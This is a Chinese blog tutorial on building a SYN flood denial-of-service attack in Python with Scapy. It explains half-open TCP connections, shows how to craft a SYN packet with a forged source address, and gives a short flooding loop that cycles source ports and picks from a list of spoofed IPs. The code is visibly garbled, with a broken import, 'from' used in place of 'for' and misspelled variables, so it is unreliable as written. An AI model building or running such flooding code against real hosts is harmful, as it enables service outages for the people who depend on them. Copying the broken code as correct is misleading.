Python项目中基于Scapy如何实现SYN泛洪攻击

这篇文章主要为大家展示了“Python项目中基于Scapy如何实现SYN泛洪攻击”，内容简而易懂，条理清晰，希望能够帮助大家解决疑惑，下面让小编带领大家一起研究并学习一下“Python项目中基于Scapy如何实现SYN泛洪攻击”这篇文章吧。

python3版本的Scapy--Scapy3k来实现一个简单的DDos。

首先实现SYN泛洪攻击（SYN Flood，是一直常用的DOS方式之一，通过发送大量伪造的TCP连接请求，使被攻击主机资源耗尽的攻击方式）。TCP三次握手的过程在这里就不再赘述，SYN攻击则是客户端向服务器发送SYN报文之后就不再响应服务器回应的报文，由于服务器在处理TCP请求时，会在协议栈留一块缓冲区来存储握手的过程，如果超过一定的时间没有接收到客户端的报文，那么本次连接在协议栈中存储的数据就会被丢弃。攻击者如果利用这段时间发送了大量的连接请求，全部挂起在半连接状态，这样将不断消耗服务器资源，直到拒接服务。

Scapy是一个强大的交互式数据包处理程序，可以用来发送、嗅探、解析和伪造网络数据包。首先需要安装Scapy3k：

sudo pip3 install scapy-python3

现在学习一下scapy的使用方法：

sudo scapy（scapy发送数据包需要root权限）

（警告信息是因为有一些依赖包没有安装，但是我们本次实验不需要使用我就不装了）

现在我们使用Scapy构造一个简单的数据包看一下：

pkt = IP(dst = "192.168.0.10")

接下来我们就构造一个SYN包：

pkt = IP(src="202.121.0.12",dst="192.168.0.100")/TCP(dport=80,flags="S")

（我们构造了一个IP包和TCP包并将它们组合到一块，这样就有了一个完整的TCP数据包，否则是无法发送出去的，IP包中我）们指定了源IP地址src和目的IP地址dst，其中src是我们伪造的地址，flags的值设定为S说明要发送的是SYN数据包）

代码实现：

具体代码如下：

import random
import scapy.all import *
 
def synFlood(tgt,dPort):
  srcList = ['201.1.1.2','10.1.1.102','69.1.1.2','125.130.5.199']
  from sPort in range(1-24,65535):
    index = random.randrange(4)
    ipLayer = IP(stc = stcList[index].dst = tgt)
    tcoLayer = TCP(sport = sPort,dport = dPort,flags = "S")
    packet = ipLayer/tcpLayer
    send(packet)

定义了srcList用于存放伪造的IP地址，之后定义了一个循环，作用是每次发送数据包源端口都改变，可以看到在构造TCP数据包的时候我们增加了一个参数sport，循环中改变的端口号就是给了sport这个参数。我们还调用random.randrange()函数来随机从srcList中获取一个伪造的IP地址。

以上是“Python项目中基于Scapy如何实现SYN泛洪攻击”这篇文章的所有内容，感谢各位的阅读！相信大家都有了一定的了解，希望分享的内容对大家有所帮助，如果还想学习更多知识，欢迎关注亿速云行业资讯频道！